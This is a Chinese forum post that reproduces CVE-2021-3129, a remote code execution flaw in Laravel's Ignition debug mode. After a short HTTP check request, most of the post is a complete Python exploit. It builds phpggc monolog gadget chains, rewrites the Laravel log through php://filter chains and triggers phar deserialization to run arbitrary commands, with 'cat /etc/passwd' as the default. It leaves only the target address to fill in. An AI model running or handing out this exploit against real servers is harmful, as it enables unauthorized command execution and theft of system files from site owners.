Laravel 漏洞复现

Track-mss   ·   发表于 2021-08-25 11:55:04   ·   CTF&WP专版

0x01 Laravel Debug mode RCE(CVE-2021-3129)

step1:验证
首先构造如下post包:

  1. POST /_ignition/execute-solution HTTP/1.1
  2. Host: 192.168.0.76:8888
  3. Content-Type: application/json
  4. Content-Length: 168
  5. {
  6. "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  7. "parameters": {
  8. "variableName": "username",
  9. "viewFile": "xxxxxxx"
  10. }
  11. }

如果页面出现下列错误


说明漏洞存在

step2:利用
首先确定本地 php环境高于5.6
执行git clone https://github.com/ambionics/phpggc.git
确定 本地的 是使用’python’ 还是 ‘python3’ 进入本地环境,在文件夹内新建exp.py,内容如下:

  1. #!/usr/bin/python3
  2. import requests as req
  3. import os, uuid
  4. # 注意,这里的`python`根据本地情况,比如换成`python3`
  5. class Exp:
  6. __gadget_chains = {
  7. "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  8. "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  9. "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
  10. } # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力
  11. __delimiter_len = 8 # 定界符长度
  12. def __vul_check(self):
  13. resp = req.get(self.__url, verify=False)
  14. if resp.status_code != 405 and "laravel" not in resp.text:
  15. return False
  16. return True
  17. def __payload_send(self, payload):
  18. header = {
  19. "Accept": "application/json"
  20. }
  21. data = {
  22. "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  23. "parameters": {
  24. "variableName": "cve20213129",
  25. "viewFile": ""
  26. }
  27. }
  28. data["parameters"]["viewFile"] = payload
  29. resp = req.post(self.__url, headers=header, json=data, verify=False)
  30. # print(resp.text)
  31. return resp
  32. def __command_handler(self, command):
  33. """
  34. 因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。
  35. """
  36. self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len] # 定界符用于定位页面中命令执行结果的位置。
  37. # print(delimiter)
  38. command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
  39. # print(command)
  40. escaped_chars = [' ', '&', '|'] # 我只想到这么多,可自行添加。
  41. for c in escaped_chars:
  42. command = command.replace(c, '\\' + c)
  43. # print(command)
  44. return command
  45. def __clear_log(self):
  46. return self.__payload_send(
  47. "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
  48. def __gen_payload(self, gadget_chain):
  49. gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
  50. # print(gen_shell)
  51. os.system(gen_shell)
  52. with open('payload.txt', 'r') as f:
  53. payload = f.read().replace('\n', '') + 'a' # 添加一个字符使得两个完整的payload总是只有一个可以正常解码
  54. os.system("rm payload.txt")
  55. # print(payload)
  56. return payload
  57. def __decode_log(self):
  58. return self.__payload_send(
  59. "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
  60. def __unserialize_log(self):
  61. return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")
  62. def __rce(self):
  63. text = self.__unserialize_log().text
  64. # print(text)
  65. echo_find = text.find(self.__delimiter)
  66. # print(echo_find)
  67. if echo_find >= 0:
  68. return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
  69. else:
  70. return "[-] RCE echo is not found."
  71. def exp(self):
  72. for gadget_chain in self.__gadget_chains.keys():
  73. print("[*] Try to use %s for exploitation." % (gadget_chain))
  74. self.__clear_log()
  75. self.__clear_log()
  76. self.__payload_send('a' * 2)
  77. self.__payload_send(self.__gen_payload(gadget_chain))
  78. self.__decode_log()
  79. print("[*] Result:")
  80. print(self.__rce())
  81. def __init__(self, target, command):
  82. self.target = target
  83. self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
  84. self.__command = self.__command_handler(command)
  85. if not self.__vul_check():
  86. print("[-] [%s] is seems not vulnerable." % (self.target))
  87. print("[*] You can also call obj.exp() to force an attack.")
  88. else:
  89. self.exp()
  90. def main():
  91. Exp("这里是目标地址", "cat /etc/passwd")
  92. if __name__ == '__main__':
  93. main()

最终目录结构如下

最终结果如下:

打赏我,让我更有动力~

0 Reply   |  Until 2021-8-25 | 896 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.